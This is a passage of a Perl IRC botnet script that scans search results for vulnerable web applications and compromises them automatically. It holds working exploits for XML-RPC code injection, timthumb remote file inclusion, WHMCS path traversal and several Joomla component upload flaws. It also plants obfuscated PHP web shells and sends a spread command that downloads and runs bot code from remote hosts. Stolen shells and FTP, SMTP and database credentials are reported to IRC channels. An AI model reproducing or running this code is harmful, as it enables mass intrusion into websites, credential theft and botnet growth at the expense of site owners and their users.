ZXU5c0Y3NDVCSFNwSWpjQWtBM0p6czQ0YmRxcnkyZjZ2RXpjMS9xUUhvbDR2VWhReHlIa01tQzBl
WVVnSlpYNW5OaW9qbElNUzQ5enFocDZJb0NNOGFBcnVNbDVWVGJVelNFSGo2VW5CeE9BNWtUWEZy
Mnh0SzA0S3QvUzRQVXc4a3IrenZlOEJxV1hROTcydTdSZ29IY1VZVVNLNU1DYThjaXp2SWlDWmE1
ODA0YzVwL0dXNUY1b0p4Nkp6bDFJN1JNZWgwMDh4TWxrUmVhcXRjNzF1QUdjVFhZYU5hOHhQWE5U
KzRlYTlwTWFBTEczMkVOcHZZeUdMWVo5SHZmNm5yWTdvd0R4aWxPVVFxMUhFcndEVk0rL0JIcjdo
b0EyTFJ1N0ZORFhEWG5ndGhsbmh5SXpKenRueTV2Z043TGR0VUUwYTNBMDZQMW02WHNkbSs4YlhY
UStMZEFzNkNyQTRMOFVBVGw1MXppUUg0M3d6UlVwbTRNTmk0cTJFQ1c2Wmg1cnVrTXRPNlBkS29B
dDZhTkRONzRRbTVVb3kyL0dTVnB2RG5CM1l3QlYrbmcrVm9aNGJ3TVcyeXQrMFp5YlhvRzViaGpr
dktkM1NSMlRkSnZkWlhWamNWOUdham9GRDdnWEt0ekk1QzZCZWEraWFUM1hkQlVSMFRpemRmc2Vo
L0pQVmxoUTVsNHIyUStIRHZIdz09IikpKTsKJGZpY2hpZXIgPSBmb3BlbignL3RtcC9sb2JleCcs
J3cnKTsKZndyaXRlKCRmaWNoaWVyLCAkYyk7CmZjbG9zZSgkZmljaGllcik7Cg==';
my $ua = LWP::UserAgent->new(agent => "<?echo 'c0li#'.php_uname().'#c0li'.get_current_user();eval(base64_decode('".$code."'));echo 'SUCCESS';?>");
$ua->timeout(7);
my $req = HTTP::Request->new(GET => $url);
my $res = $ua->request($req);
return $res->content;
}
sub xml_exploit() {
my $chan = $_[0];
my $bug = $_[1];
my $simpan = $_[2];
my $dork = $_[3];
my $engine = $_[4];
my $count = 0;
my @totexploit = &search_engine($chan,$bug,$dork,$engine,$xmllogo);
my $num = scalar(@totexploit);
if ($num > 0){
foreach my $site(@totexploit){
$count++;
if ($count == $num-1) { &msg("$chan","$xmllogo15$engine 9Finished 15for 9$dork "); }
my $test = "http://".$site.$bug;
my $vuln = "http://".$site."12".$bug;
my $html = &get_content($test);
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
if ($html =~ /faultcode/i ) {
&msg("$chan","$xmllogo15$engine 9e3x9p3l9o3i9t3i9n3g 15http://$site ");
my $resp = &xml_cek_query2($test);
if ($resp =~ /Byroe(.*)Lobex/s) {
# &xml_spread_query($test);sleep(1);
my $sys = $1;
my $shell = "http://".$site."/lobex.php";
my $check = &get_content($shell);
if ($check =~ /UnKnown - Simple Shell/) {
my $safe = ""; my $os = ""; my $uid = "";
if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;}
if ($check =~ /uid=(.*?)gid=/){$uid=$1;}
&msg("$chan","$xmllogo15$engine 4<9=4>9 sHeLL 4<9=4>9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$admin","$xmllogo15$engine 4<9=4>9 sHeLL 4<9=4>9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
}
}
}
} exit;
}
}
}
}
sub xml_cek_query() {
my $url = $_[0];
my $code = "system('uname -a');";
my $ua = LWP::UserAgent->new(agent => 'perl post');
$exploit = "<?xml version=\"1.0\"?><methodCall>";
$exploit .= "<methodName>test.method</methodName>";
$exploit .= "<params><param><value><name>',''));";
$exploit .= "echo'j13mb0t';".$code."echo'j13mb0t';exit;/*</name></value></param></params></methodCall>";
$ua->timeout(7);
my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);
return $res->content;
}
sub xml_cek_query2() {
my $url = $_[0];
my $string = "JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UXVNNEVQNThWZndINCtz
cXFSWkZPT21rU0hiWTVTQWMxUjJVZU5yN1JVUGtKaTcxa3RpUjdkRHRJZjc3amUya0w4c3V4MVpi
Q1RXZGJKNXNiRHllMFB0THpzdmRIVktWYjRJblZ4T3AvZmJ4N2c2VlJjaFIwa1ZWemZpOWYzV01l
WWI4UGFZVTFYNHJpYU00N2crdUo5NlVmQ1lQM2wyNy9kUFQ3a0hya1NtbVJrUmtqVTluQ0tUV2dr
SGgwUkNHZjFURENiNGNqV0dTeTA0OHdtckd6ZmpuTGZjdytuZ2N4YU54UE93N3dFZHhXRUJna2hH
MEpQd2VBWU9tR3QxbEU5cndzWUVwTXFQRmJsTUIrb2xrbHR4UWxaNHhKb1hJcUxlcWZ3VjVvNmVX
b25ZbG1WNVArUGowSWxldUJ1Y1JCQmhjWE9EamRFTWhTdlFWMURXQWVYY3FXQ3BReURnWFYwS1hu
QlRVWDJqa3VlL2s5UHg4Q0RMVlBkTUhMU1FFK1I1MkdGME5VOUVHcVNBczk3SHJQU0dwbGZpVHFH
Y3V4RkNRaWdMdkkzbTF3dnY0a2lpV285L013UkNPNWsyWDNVR25SQXRuZUJxNjVmMGJGRWI1VlZv
cGFCKzNISUcxWWhNSkNlYW1UWGw0ZjJUdzlUbXY1VzJCYS8vZTZzUnpmak04djFTamlaZm1na1l6
T0hOaGxLaHhWemNud1l2UGh2MmJSR1hSL3pPNlByMktQRHNOR1VpYW9XT05PaCtjamEraTYwUXlI
QXhUM2wyQU80dnlnUEUwcndCM25oVXJ5cHdHTU9oelFTUm9UN3Q4KzhnRmVic0dmdUFRYU44MFVW
MDNVUUJYNXdMaG5uTTZweWR3L2djWEM0NE9RM2w0VlBHYzVteXY0N3k5cWJSL3BwdWFOaE5qM1JU
N2g0YS9vRWZrWTNjL2Y3QWZBSjdnWUpVN3dMM09aMUpoZ1RHcDROQlE3T01BVFZyQUFQcDFlUFRi
QVdHL05jY1lDTkJaeGJMUVV5cVc4QWdSU1NrQ2pPN1h6dnV2blp0eXZTbWZPVkZWaU0yeEpwVTkw
dlpwbUV6RlJnMVlEWlVMVlliTWpLV0x6TjI0MUpqY1ViYXFRM1lwV0tGODQ5LzNPcDRkVmV2YU03
NmNaZXQzSHh3Wmg2UzZraHdaV0FEZzVvU2ZOdXhwMm5qN3QwWGMzdjZmSElEK2ZwSTZrWkhNQThs
eGdRcXpRMERwRzdOdUViRWFoQmlmdkM3b21TZ0t3ck5Ud0I3amNxV1JYcFkweEpwKzBSZ1pqVkNj
RmhuZTlzYlZ0R0I0djR1RDBTUEpLL3Y3QWZBZFJ0bUphcnhkS1lVRHNpR0tLdGVzaEVxUHhSMXhV
Wk9tOHFZZDA4MS90REF1Wms0eVo4RmxkOXZvR1BTTFllWXN5eWl2cTBpdTlpM0FEUGkxMjh5bStZ
bnJuQjljdEVxcnVLWUx5KzZpelNJMjRoczFIZnZvMXpvUHB3dnpnRVNhRTZWUFdyWUlyc2phaDZk
dHBhMTRhMWplalJWNEZKdHJqdHdzMmNveU1uTzJmYm0rQTNzdFcxVERxY3NCMHBObzJLVjV0bU04
OFJwV3ZEdkFUSkNkdzA4ODBzUlNwMHh2QVA0M0tib29FMVNEemJ1cUpyQjI2bTkrVlNqVHJkc2p6
VWZBMjVOemN5ODhJN2VRMFpZL3J0SVUvZ2xQR2xuQjErRmdiR2pQRVQ1VHovYTJ2UkM1SHZwVGNy
Z2pTYkxhVEhIMnpRV3NjeVVsOUF0R1RjR2JjcWswTGJ5TlpYdWxwSnRiMEZrTGtaUzRWakdSYnVK
SGEyZHIrQTVXc1RCQzd5emVoZkphOHZhYTNuYjRtekU3V2c3WHpzZVRmd0U9IikpKTsKJGZpY2hp
ZXIgPSBmb3BlbignLi9sb2JleC5waHAnLCd3Jyk7CmZ3cml0ZSgkZmljaGllciwgJGMpOwpmY2xv
c2UoJGZpY2hpZXIpOwo==";
my $ua = LWP::UserAgent->new(agent => 'perl post');
$exploit = "<?xml version=\"1.0\"?><methodCall>";
$exploit .= "<methodName>test.method</methodName>";
$exploit .= "<params><param><value><name>',''));";
$exploit .= "echo 'Byroe';echo(php_uname());eval(base64_decode('$string'));echo 'Lobex';exit;/*</name></value></param></params></methodCall>";
$ua->timeout(7);
my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);
return $res->content;
}
sub xml_spread_query() {
my $xmltargt = $_[0];
my $xmlsprd = "system('wget ".$injector." -O lobex.php;fetch ".$injector.";mv bad.txt lobex.php;wget ".$botshell." -O tmp.php;fetch ".$botshell.";mv bot.txt tmp.php;killall -9 perl;killall -9 php;cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php bot.txt;rm -rf bot.txt;wget ".$botshell.";php bot.txt;rm -rf bot.txt;curl -O ".$botshell.";php bot.txt;rm -rf bot.txt;lwp-download ".$botshell.";php bot.txt;cd /var/tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php bot.txt;rm -rf bot.txt;wget ".$botshell.";php bot.txt;rm -rf bot.txt;curl -O ".$botshell.";php bot.txt;rm -rf bot.txt;lwp-download ".$botshell.";php bot.txt;');";
my $userAgent = LWP::UserAgent->new(agent => 'perl post');
$exploit = "<?xml version=\"1.0\"?><methodCall>";
$exploit .= "<methodName>test.method</methodName>";
$exploit .= "<params><param><value><name>',''));";
$exploit .= "echo'j13m';".$xmlsprd."echo'b0T';exit;/*</name></value></param></params></methodCall>";
$userAgent->timeout(7);
my $response = $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit);
}
sub thumb_exploit() {
my $chan = $_[0];
my $bug = $_[1];
my $simpan = $_[2];
my $dork = $_[3];
my $engine = $_[4];
my $count = 0;
my @totexploit = &search_engine($chan,$bug,$dork,$engine,$thumblogo);
my $num = scalar(@totexploit);
if ($num > 0){
foreach my $site(@totexploit){
$count++;
my $vuln = "http://".$site.$bug."?src=".$thumbshell;
my $botis = "http://".$site.$bug."?src=".$botid;
my $botxc = "http://".$site.$bug."?src=".$botxid;
my @nbug = split(/\//,$bug);
my $cek = &get_content($vuln);
if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else {
if ($cek =~ /Unable to open image(.*?)$nbug[0](.*?)$md5php/i){
&msg("$chan","$thumblogo15$engine 9e3x9p3l9o3i9t3i9n3g 15http://$site ");
my $pdir = $2;
if ($spreadMode == 1) { &get_content($botis); &get_content($botxc);sleep(1); }
my $crut = "http://".$site.$nbug[0].$pdir.$md5php;
my $botc = "http://".$site.$nbug[0].$pdir.$md5bot;
my $botpc = "http://".$site.$nbug[0].$pdir.$md5botx;
my $npath = "http://".$site."wp-includes/wp-script.php";
my $check = &get_content($crut."?clone");sleep(1);
if ($check =~ /stunshell/i){
my $safe = ""; my $os = ""; my $uid = "";
if ($check =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
if ($check =~ m/color=red><b> (.*?)<br>/) {$os = $1;}
if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;}
my $crot = &get_content($npath);sleep(1);
if ($crot =~ /stunshell/i){
&msg("$admin","$thumblogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$npath."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$chanxxx","$thumblogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$npath."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
} else {
&msg("$admin","$thumblogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$crut."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$chan","$thumblogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$crut."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
}
&get_content($botc);sleep(1);
&get_content($botpc);sleep(1);
}
}
} exit; }
if ($count == $num-1) { &msg("$chan","$thumblogo15$engine 9Finished 15for 9$dork "); }
}
}
}
sub whmcs_exploit() {
my $chan = $_[0];
my $bug = $_[1];
my $simpan = $_[2];
my $dork = $_[3];
my $engine = $_[4];
my $count = 0;
my @totexploit = &search_engine($chan,$bug,$dork,$engine,$whmcslogo);
my $num = scalar(@totexploit);
if ($num > 0){
foreach my $site(@totexploit){
$count++;
if ($count == $num-1) { &msg("$chan","$whmcslogo15$engine 9Finished 15for 9$dork "); }
my $test1 = "http://".$site.$bug."../../../configuration.php%00";
my $submit = "http://".$site.$subticket;
my $html = &get_content($test1);
if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else {
if ($html =~ /db_host/i) {
my $userpass = &getUserPass($html); sleep(2);
my $info = &getinfo($html); sleep(2);
&msg("$chaninfo","$whmcslogo15$engine 4<9=4>9 info 15[ 9http://".$site."15 ] 9$info");
my $lulz = "http://".$site;
my $user = ""; my $pass = ""; my $user2 = ""; my $pass2 = ""; my $dtbs2 = "";
if($lulz =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) {
my $host = $2;
my @ftpu = split(":Viva-Byroe.Net:", $userpass);
my @dbic = split(":Viva-Byroe.Net:", $info);
$user = $ftpu[0]; $pass = $ftpu[1];
$user2 = $dbic[0]; $pass2 = $dbic[1]; $dtbs2 = $dbic[2];
my $ftpstat = "";
if($user =~ /_/) { @userz = split("_", $user); $user = $userz[0];}
&ftp_connect($test1,$host,$user,$pass,$chan,$engine,$whmcslogo);sleep(1);
&dbi_connect($host,$user2,$pass2,$dtbs2,$chan,$engine,$whmcslogo);sleep(1);
}
my $ceksubmit = &get_content($submit);
if ($ceksubmit =~ /Urgency/i) {
&msg("$submitchan","$whmcslogo15$engine 4<9=4>9 Submit Ticket 15[9 ".$submit." 15]"); sleep(2);
my $uploader = "http://".$site."/downloads/indexx.php";
my $uploader2 = "http://".$site."/templates_c/indexx.php";
my $cekup = &get_content($uploader);
my $cekup2 = &get_content($uploader2);
if ($cekup =~ /enctype=\"multipart\/form-data"/i) { &msg("$chanxxx","$whmcslogo15$engine 4<9=4>9 Uploader 15[9 ".$uploader." 15]");&msg("$admin","$whmcslogo15$engine 4<9=4>9 Uploader 15[9 ".$uploader." 15]"); }
if ($cekup2 =~ /enctype=\"multipart\/form-data"/i) { &msg("$chanxxx","$whmcslogo15$engine 4<9=4>9 Uploader 15[9 ".$uploader2." 15]");&msg("$chanxxx","$whmcslogo15$engine 4<9=4>9 Uploader 15[9 ".$uploader2." 15]"); }
}
}
} exit;
}
}
}
}
sub jce_exploit() {
my $chan = $_[0];
my $bug = $_[1];
my $simpan = $_[2];
my $dork = $_[3];
my $engine = $_[4];
my $count = 0;
my @totexploit = &search_engine($chan,$bug,$dork,$engine,$jcelogo);
my $num = scalar(@totexploit);
if ($num > 0){
foreach my $site(@totexploit){
$count++;
if ($count == $num-1) { &msg("$chan","$jcelogo15$engine 9Finished Gan..."); }
my $crott = "http://".$site."images/stories/bouncer.php";
my $iam = "http://".$site."/images/stories/bouncer.php";
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $status = &jce_upload($site);
if ($status = 1) {
my $check = &get_content($crott."?rf");
if ($check =~ /Hacker BoUnCeR - Irc.hackerbouncer.us.to/) {
my $safe = ""; my $os = ""; my $uid = "";
my $smtphost = ""; my $smtpuser = ""; my $smtppass = "";
my $ftphost = ""; my $ftpuser = ""; my $ftppass = "";
if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;}
if ($check =~ /uid=(.*?)gid=/){$uid=$1;}
if ($check =~ m/\$smtphost = '(.+?)';/i){$smtphost=$1;}
if ($check =~ m/\$smtpport = '(.+?)';/i){$smtpport=$1;}
if ($check =~ m/\$smtpuser = '(.+?)';/i){$smtpuser=$1;}
if ($check =~ m/\$smtppass = '(.+?)';/i){$smtppass=$1;}
if ($check =~ m/\$ftp_host = '(.+?)';/i){$ftphost=$1;}
if ($check =~ m/\$ftp_port = '(.+?)';/i){$ftpport=$1;}
if ($check =~ m/\$ftp_user = '(.+?)';/i){$ftpuser=$1;}
if ($check =~ m/\$ftp_pass = '(.+?)';/i){$ftppass=$1;}
&msg("$chan","$jcelogo4TARGET1 12SEND 3TO 13$nick I Sent You A Shell ^_^ 4<9=4> (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$nick","$jcelogo15$engine 4<9=4>9 sHeLL 4<9=4>9 $crott15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$admin","$jcelogo15$engine 4<9=4>9 sHeLL 4<9=4>9 $crott15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$admin","$jcelogo15$engine 4<9=4>9 sHeLL 4<9=4>9 $iam15 (SafeMode=$safe) (OS=$os) uid=$uid ");
if (defined($ftpuser)){
&msg("$admin","$jcelogo15$engine 4<9=4>9 FTP ftp://$site15 [ HOST = $ftphost PORT = $ftpport USER = $ftpuser PASS = $ftppass ] ");
&msg("$nick","$jcelogo15$engine 4<9=4>9 FTP ftp://$site15 [ HOST = $ftphost PORT = $ftpport USER = $ftpuser PASS = $ftppass ] ");
}
if (defined($smtpuser)){
&msg("$admin","$jcelogo15$engine 4<9=4>9 SMTP ftp://$site15 [ HOST = $smtphost PORT = $smtpport USER = $smtpuser PASS = $smtppass ] ");
&msg("$nick","$jcelogo15$engine 4<9=4>9 SMTP ftp://$site15 [ HOST = $smtphost PORT = $smtpport USER = $smtpuser PASS = $smtppass ] ");
}
}
}
} exit;
}
}
}
}
sub jce_upload() {
my $success = 0;
my $url = $_[0];
$url =~ s/http:\/\///;
my $host = $url;
my $path = $url;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$path =~ s/(.*)\/[^\/]*$/\1/;
$path .= "/";
$path =~ s/([-a-zA-Z0-9\.]+)/$2/;
if ($path eq "") { $path = "/" }
$header1P = "POST ".$path."index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1";
$header1P2 = "POST ".$path."index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1";
$header2 = "Host: $host";
$header3 = "User-Agent: BOT/0.1 (BOT for JCE)";
$header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334";
$header5 = "Content-Length: 4567";
$header6 = "-----------------------------41184676334";
$header7 = 'Content-Disposition: form-data; name="upload-dir"';
$header8 = '/';
$header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""';
$header10 = 'Content-Type: application/octet-stream';
$header11 = 'Content-Disposition: form-data; name="upload-overwrite"';
$header12 = "0";
$header13 = 'Content-Disposition: form-data; name="Filedata"; filename="bouncer.gif"';
$header14 = 'Content-Type: image/gif';
$header15 = 'GIF89aGbouncer';
$header16 = "<?php eval(gzinflate(str_rot13(base64_decode('rUl6QuM4EP58VfwH46uURwspe6eTSUDQshCOV1TL9eW+AIrccdptVuLIaWB7iP9+cDvpy8Jl7HcrUZNsfeaZ8bggpZCxhEVVzYuZv98+3N7iRuLvY6VA+61rGA2H3X7v2puwz+zOu3q3f2zc3nfdZsVoIqpPk5Dso0brASb4dRwG/1GDeG0xGl3FF/3hiN4aNS8+YqgH0d/jdTiKx4OuM5iIZ4EWlKWMLEsxI+gBiSY3hQl6/KkxRnkK+X4KdfqRFzyeIVfPCONcpOAt8S8N2+SxpSCpJNcLDD88OY/iy/5MhAH65+f08HZ7CzIFr0v10MimBkyCDDHjXCg9TBQsB39Mkee+45OzswHSR9cMak1VDPItp05n2R9SeEE545lCqx6wLBES+8I0F8XHmZEHicjpLqGWK7pYL5jiGflxGsMKMte6POhnGraQt6agm6J7UoYg78FAqeu4KQhXu5ZxIUTcoKUW+7PG131e0fXM4t07yxOf+s3w/BmNrr0kEwWYwTFmo1ElE0ufBGJrOuhejeLz7l9E7+Qy8uw0pKA0J+HK6qx/Or6MbaNr0O+PvNuAaWvOc6A6CiFm/J4KkZp/GnFDzlgzLBIc2y7pLmRE266KnzhWB2KapAM3VnWUzAWhVJrrDI4vS2WHevkkxsUpDMge6cokmFvhBI9KgtVHKtDiqOPsjyby2NRJB5kKPIGK/wvhYiQRGTby1w/2g4bHNEsiCehEdLJnYaEwrmMOT+rTAAuPRIB5div02wF6vzXHGB2wtIqnoY2UL/ARIyxGBJTMScrZ18poS2LKdE2KCal2ZVzZBrc3w1mRNmZ1VfmAyYgZu+QhaIcwMSI3pK0qR03iEUa+0e9tHc/OqEjtGF0GhUi1994bhQRdyYIYVoDGWr8f1+T2ANTyl0Xc3HxCDrT+aZI6kaHMUMpxQWWzcJDpK7NnCbMchJQev0HoqchmSaQNgVS8KCta9KKEkHf4oikxHIc0yUa6qR1Jk5yv9C4OJfcsq+z7HdpqDLJw72MTKWCDeYi8yjQvmdTWYS9ymjXIm2VZNf9GwrjMBFjJOc/AltEx1s+qmfM0haJTqxz2DYMp+td3M5vmldY5P7h1r6LowYP1PiDrINbiGzad9/s/6jwFPJgHV5KMKRV3tuHgQNY6OtFYYV3BG/Suel3D2LXnnJu9W0yPlJsLoFydgZ2WxdH41GPQ6dEq7J42i2xr7TWUa7d1dI3sHObiHm8XHdLYGPgvuui8jJ0b7uElmsCmqcH8lEOmTbdUmqnAixNFsxeeiFvPcVA/rJIElCIaUsHX4WNsHVwRbVWe7HZ7U2U99A3La1MscrUyQu1ySa+1RcL6BP3eWdC+/eCySWbIshi+QOKbVWmruSHqGF+6sU02r9h8BU7UGEmKH4UgvguDnDYQ5BQBmHPF9nNOYrxMFF40Tgf/8H3KdJX7XXBi6mkDED3Xf26QH0Dtcorscsx7Efh/')))); ?> ";
$header17 = 'Content-Disposition: form-data; name="upload-name"';
$header18 = 'bouncer';
$header19 = 'Content-Disposition: form-data; name="action"';
$header20 = 'upload';
$header21 = "-----------------------------41184676334--";
$header22 = 'X-Request: JSON';
$header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8';
$header25 = 'json={"fn":"folderRename","args":["/bouncer.gif","bouncer.php"]}';
$header24 = "Content-Length: ".length($header25)."";
my $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host" ,PeerPort=>"80") || return;
print $remote "$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n$header8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header12\n$header6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header17\n\n$header18\n$header6\n$header19\n\n$header20\n$header21\n\n";
my $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host" ,PeerPort=>"80") || return;
print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n";
while ($hasil = <$remote>) {
if ($hasil =~ /200 OK/) {
$success = 1;
}
return $success;
}
}
sub jnews_exploit() {
my $chan = $_[0];
my $bug = $_[1];
my $simpan = $_[2];
my $dork = $_[3];
my $engine = $_[4];
my $count = 0;
my @totexploit = &search_engine($chan,$bug,$dork,$engine,$jnewslogo);
my $num = scalar(@totexploit);
if ($num > 0){
foreach my $site(@totexploit){
$count++;
if ($count == $num-1) { &msg("$chan","$jnewslogo15$engine 9Finished 15for 9$dork "); }
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $nama = $simpan;
my $jnewsshell = "http://".$site."/components/com_jnews/includes/openflashchart/tmp-upload-images/bouncer.php";
my $jnewss = "http://".$site."/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php";
my $cek = &get_content($jnewss);
if ($cek =~ /Saving your image/i){
# &msg("$chan","$jnewslogo15$engine 9e3x9p3l9o3i9t3i9n3g 15http://$site ");
my $type = $rceinjector."?url=".$site."&type=jnews";
my $cekk = &get_content($type);
$check = &get_content($jnewsshell."?bouncer");
&get_content($jnewsshell."?delete");
&get_content($jnewsshell."?botnet");
if ($cekk =~ /sukses bos bouncer/i){
if ($check =~ /Hacker BoUnCeR/) { my $safe = ""; my $os = ""; my $uid = "";
if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;}
if ($check =~ /uid=(.*?)gid=/){$uid=$1;}
&msg("$chan","$jnewslogo4TARGET1 12SEND 3TO 13$nama I Just Sent You A Bloody Shell... ^_^ 4<9=4> (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$nama","$jnewslogo15$engine 4<9=4>9 sHeLL 4<9=4>9 $jnewsshell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$admin","$jnewslogo15$engine 4<9=4>9 sHeLL 4<9=4>9 $jnewsshell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
}
}
}
} exit; }
}
}
}
sub jinc_exploit() {
my $chan = $_[0];
my $bug = $_[1];
my $simpan = $_[2];
my $dork = $_[3];
my $engine = $_[4];
my $count = 0;
my @totexploit = &search_engine($chan,$bug,$dork,$engine,$jinclogo);
my $num = scalar(@totexploit);
if ($num > 0){
foreach my $site(@totexploit){
$count++;
if ($count == $num-1) { &msg("$chan","$jinclogo15$engine 9Finished 15for 9$dork "); }
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $nama = $simpan;
my $jincshell = "http://".$site."/administrator/components/com_jinc/classes/graphics/tmp-upload-images/bouncer.php";
my $jincs = "http://".$site."/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php";
my $cek = &get_content($jincs);
if ($cek =~ /Saving your image/i){
# &msg("$chan","$jinclogo15$engine 9e3x9p3l9o3i9t3i9n3g 15http://$site ");
my $type = $rceinjector."?url=".$site."&type=jinc";
my $cekk = &get_content($type);
$check = &get_content($jincshell."?bouncer");
&get_content($jincshell."?delete");
&get_content($jincshell."?botnet");
if ($cekk =~ /sukses bos bouncer/i){
if ($check =~ /Hacker BoUnCeR/) { my $safe = ""; my $os = ""; my $uid = "";
if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;}
if ($check =~ /uid=(.*?)gid=/){$uid=$1;}
&msg("$chan","$jinclogo4TARGET1 12SEND 3TO 13$nama I Just Sent You A Bloody Shell... ^_^ 4<9=4> (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$nama","$jinclogo15$engine 4<9=4>9 sHeLL 4<9=4>9 $jincshell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$admin","$jinclogo15$engine 4<9=4>9 sHeLL 4<9=4>9 $jincshell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
}
}
}
} exit; }
}
}
}
sub letter_exploit() {
my $chan = $_[0];
my $bug = $_[1];
my $simpan = $_[2];
my $dork = $_[3];
my $engine = $_[4];
my $count = 0;
my @totexploit = &search_engine($chan,$bug,$dork,$engine,$letterlogo);
my $num = scalar(@totexploit);
if ($num > 0){
foreach my $site(@totexploit){
$count++;
if ($count == $num-1) { &msg("$chan","$letterlogo15$engine 9Finished 15for 9$dork "); }
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $nama = $simpan;
my $lettershell = "http://".$site."/administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/bouncer.php";
my $letters = "http://".$site."/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php";
my $cek = &get_content($letters);
if ($cek =~ /Saving your image/i){
# &msg("$chan","$letterlogo15$engine 9e3x9p3l9o3i9t3i9n3g 15http://$site ");
my $letterv = "http://www.victorparts.fr/vp31/fullscreen/iam.php?url=";
my $type = $rceinjector."?url=".$site."&type=letter";
my $cekk = &get_content($type);
$check = &get_content($lettershell."?bouncer");
&get_content($lettershell."?delete");
&get_content($lettershell."?botnet");
if ($cekk =~ /sukses bos bouncer/i){
if ($check =~ /Hacker BoUnCeR/) { my $safe = ""; my $os = ""; my $uid = "";
if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;}
if ($check =~ /uid=(.*?)gid=/){$uid=$1;}
&msg("$chan","$letterlogo4TARGET1 12SEND 3TO 13$nama I Just Sent You A Bloody Shell... ^_^ 4<9=4> (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$nama","$letterlogo15$engine 4<9=4>9 sHeLL 4<9=4>9 $lettershell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$admin","$letterlogo15$engine 4<9=4>9 sHeLL 4<9=4>9 $lettershell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
}
}
}
} exit; }
}
}
}
sub redmistyc_exploit() {
my $chan = $_[0];
my $bug = $_[1];
my $simpan = $_[2];
my $dork = $_[3];
my $engine = $_[4];
my $count = 0;
my @totexploit = &search_engine($chan,$bug,$dork,$engine,$redmistyclogo);
my $num = scalar(@totexploit);
if ($num > 0){
foreach my $site(@totexploit){
$count++;
if ($count == $num-1) { &msg("$chan","$redmistyclogo15$engine 9Finished 15for 9$dork "); }
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $nama = $simpan;
my $redmistycshell = "http://".$site."/administrator/components/com_redmystic/chart/tmp-upload-images/bouncer.php";
my $redmistycs = "http://".$site."/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php";
my $cek = &get_content($redmistycs);
if ($cek =~ /Saving your image/i){
# &msg("$chan","$redmistyclogo15$engine 9e3x9p3l9o3i9t3i9n3g 15http://$site ");
my $type = $rceinjector."?url=".$site."&type=redmistyc";
my $cekk = &get_content($type);
$check = &get_content($redmistycshell."?bouncer");
&get_content($redmistycshell."?delete");
&get_content($redmistycshell."?botnet");
if ($cekk =~ /sukses bos bouncer/i){
